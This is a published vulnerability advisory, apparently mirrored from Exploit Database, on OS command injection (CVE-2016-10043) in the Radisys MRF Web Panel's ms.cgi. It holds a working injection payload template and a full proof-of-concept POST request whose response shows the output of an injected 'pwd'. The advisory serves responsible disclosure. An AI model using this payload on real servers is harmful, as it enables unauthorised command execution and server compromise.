Radisys MRF – Command Injection

• Exploit Database
• 16 阅读

• 作者： Filippos Mastrogiannis
  日期： 2017-01-27
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/41179/

• Title:MRF Web Panel OS Command Injection
  Vendor: Radisys
  Vendor Homepage: http://www.radisys.com
  Product:MRF Web Panel (SWMS)
  Version:9.0.1
  CVE:CVE-2016-10043
  CWE:CWE-78
  Risk Level: High
  
  Discovery:Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
  COSMOTE (OTE Group) Information & Network Security
  
  -----------------------------------------------------------------------------------------
  
  
  Vulnerability Details:
  
  The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
  attacks.
  
  > Affected parameter: MSM_MACRO_NAME (POST parameter)
  > Affected file: ms.cgi (/swms/ms.cgi)
  > Verified Affected Operation: Show Fatal Error and Log Package Configuration
  
  It is possible to use the pipe character (|) to inject arbitrary OS commands
  and retrieve the output in the application's responses:
  
  MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
  
  
  Proof Of Concept:
  
  1. Login to the vulnerable MRF web panel (with a standard user account): 
   https://<vulnerable>/swms
  2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)
  3. Modify and send the following POST request:
  
  POST /swms/ms.cgi HTTP/1.1
  Host: <vulnerable>
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate, br
  Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 213
  
  MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
  
  4. Check the output of the injected command 'pwd' in the response:
  
  HTTP/1.1 200 OK
  Date: Thu, 21 Jul 2016 08:18:43 GMT
  Server: Apache
  Cache-Control: no-cache
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Content-Length: 23
  
  /var/opt/swms/www/html
  
  
  Vulnerability Impact:
  
  Application's own data and functionality or the web server can be compromised due
  to OS command injection vulnerabilities. It may also be possible to use the server
  as a platform for attacks against other systems.
  
  
  Disclaimer:
  
  The responsible disclosure policy has been followed